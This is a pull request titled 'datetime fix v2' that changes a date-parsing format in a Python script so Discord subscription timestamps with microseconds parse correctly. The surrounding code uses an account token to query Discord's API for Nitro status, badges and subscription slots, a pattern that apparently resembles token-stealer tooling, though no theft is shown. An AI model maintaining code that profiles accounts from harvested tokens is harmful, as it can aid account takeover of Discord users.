### PR TITLE
datetime fix v2

### DIFF
--- a/main.py
+++ b/main.py
@@ -132,7 +132,7 @@ def main():
                 exp_date = None
                 if has_nitro:
                     badges += f":BadgeSubscriber: "
-                    exp_date = datetime.datetime.strptime(res[0]["current_period_end"], "%Y-%m-%dT%H:%M:%S%z").strftime('%d/%m/%Y at %H:%M:%S')
+                    exp_date = datetime.datetime.strptime(res[0]["current_period_end"], "%Y-%m-%dT%H:%M:%S.%f%z").strftime('%d/%m/%Y at %H:%M:%S')
 
                 res = requests.get('https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots', headers=getheaders(token)).json()
                 available = 0


### PR DESCRIPTION
Fixed:

An error occurred: time data '2025-05-24T19:25:39.596293+00:00' does not match format '%Y-%m-%dT%H:%M:%S%z'